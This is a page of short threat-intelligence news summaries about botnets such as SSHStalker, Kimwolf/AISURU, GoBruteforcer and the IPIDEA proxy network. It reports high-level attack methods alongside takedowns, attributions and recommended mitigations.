All news with #botnet tag

🔐 Researchers at Flare Systems uncovered a botnet, dubbed SSHStalker, that brute-forces weak SSH passwords and had compromised an estimated 7,000 Linux servers by the end of January, with roughly half located in the United States. The toolkit combines fileless malware, rootkits, log cleaners and a library of kernel exploits — some dating to 2009 — and can harvest AWS credentials. Flare characterizes it as a "scale-first" operation focused on persistence; observed capabilities include DDoS and cryptomining, though monetization has not yet been seen. Immediate mitigations include disabling SSH password authentication, switching to key-based or short-lived credentials, and restricting and rate-limiting SSH access.

🛡️ The massive Kimwolf IoT botnet has been disrupting the I2P anonymity network after thousands of infected devices attempted to join as nodes, overwhelming relays and degrading connectivity. Users reported a rapid influx of new routers and widespread connection failures starting around Feb. 3, and developers linked the outages to a Sybil-style flood. Kimwolf operators later admitted they tried to register roughly 700,000 bots on I2P, and the network is currently running at reduced capacity while a stability update is rolled out.

🛡️ Flare researchers describe SSHStalker, an IRC-controlled botnet that automates mass compromise of Linux systems by combining SSH scanning with a back-catalog of legacy kernel exploits. The operation drops C-based bots, Perl IRC bots that connect to UnrealIRCd, rootkit components, log-cleaning utilities and a keep-alive to maintain persistence. A Golang scanner enumerates SSH hosts and the toolkit includes automated erasure of SSH connection logs; unlike typical botnets, many infections remain dormant after access is obtained, suggesting staging or long-term retention.

🛡️ A newly documented Linux botnet named SSHStalker uses the legacy IRC protocol for command-and-control while relying on noisy SSH scanning and brute forcing for initial access. Researchers at Flare say it deploys a Go binary masquerading as nmap, compiles C-based IRC bots on hosts, and persists via cron jobs that run every 60 seconds. The kit favors scale and reliability over stealth, reuses a back-catalog of decade-plus-old CVEs for privilege escalation, and includes AWS key harvesting, cryptomining, and dormant DDoS code.

🛡️ Kaspersky says the threat actor tracked as Stan Ghouls (also referred to as Bloody Wolf) has conducted spear‑phishing operations to deliver NetSupport RAT to systems in Uzbekistan and Russia. Malicious PDFs embed links that download a loader which displays fake errors, limits installation attempts, retrieves the RAT from multiple domains and ensures persistence through Startup items, a Registry autorun entry and a scheduled task. Kaspersky estimates roughly 50 victims in Uzbekistan and 10 in Russia, with additional infections in Kazakhstan, Turkey, Serbia and Belarus. The vendor also discovered Mirai botnet payloads staged on infrastructure associated with the actor, raising concerns about an expanded IoT targeting capability.

🚨 Cloudflare attributed a record hyper‑volumetric HTTP DDoS to the AISURU/Kimwolf botnet that peaked at 31.4 Tbps and lasted 35 seconds in November 2025. The group was also linked to a campaign codenamed The Night Before Christmas, which began on December 19, 2025, and produced averages near 3 Bpps, 4 Tbps and 54 Mrps. Google and Cloudflare disrupted the IPIDEA residential proxy network used to recruit more than 2 million Android devices.

🛡️ Silent Push links the long-running SystemBC malware to more than 10,000 infected IP addresses worldwide, including hosts tied to government sites. SystemBC acts as a multi-platform SOCKS5 proxy, turning compromised machines into relays that help attackers hide infrastructure and maintain persistence, often appearing before ransomware is deployed. Researchers found infections concentrated in data centres, uncovered a Perl-based Linux variant undetected by 62 antivirus engines, and observed reliance on abuse-tolerant hosting for C2 operations.

🛡️ Google disrupted the IPIDEA residential proxy network by seizing or sinkholing command-and-control domains, cutting operators' ability to route traffic and reducing millions of exit nodes that had been recruited via bundled SDKs or monetization lures. Microsoft released an out‑of‑band patch for an actively exploited Office zero‑day (CVE-2026-21509), while Ivanti fixed two EPMM RCEs. CERT Polska attributed destructive intrusions against Polish energy assets to Static Tundra, and criminals were observed hijacking exposed LLM endpoints for resale and lateral access. Researchers also documented new modular frameworks, open BYOB C2 repositories, and continued exploitation of web platforms and DevOps tooling.

🔒 Google Threat Intelligence Group, working with industry partners, disrupted the IPIDEA residential proxy network by taking down domains, infected-device management systems, and proxy-traffic routing infrastructure. The operation targeted SDKs embedded in at least 600 trojanized Android apps and over 3,000 malicious Windows binaries, which collectively enrolled about 6.7 million devices worldwide. GTIG reported that more than 550 distinct threat groups abused IPIDEA for account takeovers, credential theft, botnet control, and DDoS support; users should avoid untrusted VPNs and apps that pay for bandwidth.

🔍 Google and industry partners have disrupted IPIDEA, a large residential proxy network used to conceal malicious activity. The operation combined court action to seize domains with intelligence-sharing and platform enforcement, including expanded protections in Google Play Protect that remove apps embedding IPIDEA SDKs and block further installs. Google reports these steps have reduced the pool of proxy devices by millions and expect knock-on effects across reseller-linked services. The network’s SDKs were tied to multiple botnets and used by numerous threat actors to obscure follow-on attacks.

🔴 Cloudflare says the Aisuru/Kimwolf botnet launched a record DDoS campaign on December 19 that peaked at 31.4 Tbps and about 200 million requests per second. The attacks, dubbed The Night Before Christmas, targeted telecommunications and IT providers and hit Cloudflare’s dashboard and infrastructure. Sources were identified as compromised Android TVs rather than typical IoT routers, and most bursts lasted one to two minutes. Cloudflare reports the attacks were detected and mitigated automatically without triggering internal alerts.

🏠 This week Google Threat Intelligence Group led coordinated legal, technical, and platform actions to disrupt the IPIDEA residential proxy network, a large global provider of exit-node infrastructure. Actions included domain takedowns, sharing SDK and infrastructure intelligence with platform providers and law enforcement, and enforcing Google Play Protect to remove and block offending apps. These steps materially degraded IPIDEA’s operations and reduced the pool of available exit-node devices by millions while enabling broader partner remediation.

🔍 New analysis links the operators of the Badbox 2.0 Android TV botnet to named individuals and companies in China, following a screenshot allegedly obtained by the Kimwolf botmasters that shows authorized accounts. Open-source pivots on qq.com email addresses connect several accounts to developers and domains previously tied to Badbox activity. Google and the FBI are pursuing the operators while researchers warn that Kimwolf’s unauthorized access could let it push malware directly onto millions of infected streaming devices.

🚨A new IoT botnet, Kimwolf, has infected more than two million devices and is being used for large-scale DDoS and to relay abusive traffic. Operators abuse commercial residential proxy services—most prominently IPIDEA—to reach proxy endpoints and scan local networks, enabling lateral infections of vulnerable devices, particularly unofficial Android TV boxes. Some proxy providers have begun blocking Kimwolf-related traffic, but millions of infected endpoints remain within corporate and government networks.

⚠️ Check Point Research links the Linux-based RondoDox botnet to a coordinated exploitation campaign against HPE OneView, leveraging the critical RCE flaw CVE-2025-37164. The vulnerability, published to the NVD on 16 December 2025 and rated CVSS 3.1 = 10 by HPE, has been the subject of tens of thousands of automated attack attempts. Check Point reported blocking more than 40,000 hits on 7 January 2026 and urged organizations to patch immediately and implement compensating controls.

🚨 Black Lotus Labs said it null-routed traffic to more than 550 command-and-control nodes tied to the AISURU/Kimwolf botnet after detecting rapid growth beginning in early October 2025. Researchers attribute the expansion to a malicious ByteConnect SDK delivered to unsanctioned Android TV devices and proxy services that expose Android Debug Bridge (ADB). The botnet, leveraged for DDoS and residential proxy leasing, has infected more than two million devices and has been linked to hosting providers and proxy marketplaces where compromised nodes were offered for sale.

🔒 A new wave of GoBruteforcer attacks is targeting cryptocurrency and blockchain project databases by exploiting weak, reused credentials and exposed services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux hosts. Check Point Research reports the Golang-based botnet deploys obfuscated IRC bots and web shells, leverages XAMPP FTP as an initial vector, and uses brute-force modules to expand, host payloads, and act as backup C2.

🛡️ Cisco Talos warns that a China-linked actor tracked as UAT-7290 has expanded its focus to telecommunications providers in Southeastern Europe. The group leverages Linux-based malware and one-day public exploits against edge network devices, plus targeted SSH brute force, to gain initial access and escalate privileges. UAT-7290 also establishes Operational Relay Boxes (ORBs) that are reused by other China-aligned actors. Talos published technical details and IOCs to help affected organizations respond.

🔍 This analysis traces how the Aisuru and Kimwolf botnets turned millions of unsecured Android TV streaming boxes into residential proxies and DDoS participants. Investigators linked proxy traffic and control infrastructure to a Utah hosting firm, Resi Rack, a Discord marketplace (resi.to), and vendors including Plainproxies/ByteConnect and Maskify. Operators hardened control with the Ethereum Name Service to evade takedowns. Owners of affected TV boxes are urged to disconnect and replace them.

🔒 Check Point Research (CPR) reports that the GoBruteforcer botnet is actively targeting internet‑facing Linux servers, using large‑scale brute‑force attacks against services such as FTP, MySQL, PostgreSQL and phpMyAdmin. The latest Go‑based variant, observed since mid‑2025, introduces heavier obfuscation, stronger persistence and techniques to hide malicious processes. Compromised hosts become scanning and attack nodes, enabling data theft, backdoors, resale of access and further propagation. Analysts also recovered tools used to sweep TRON and Binance Smart Chain assets, underscoring a financial motive behind some campaigns.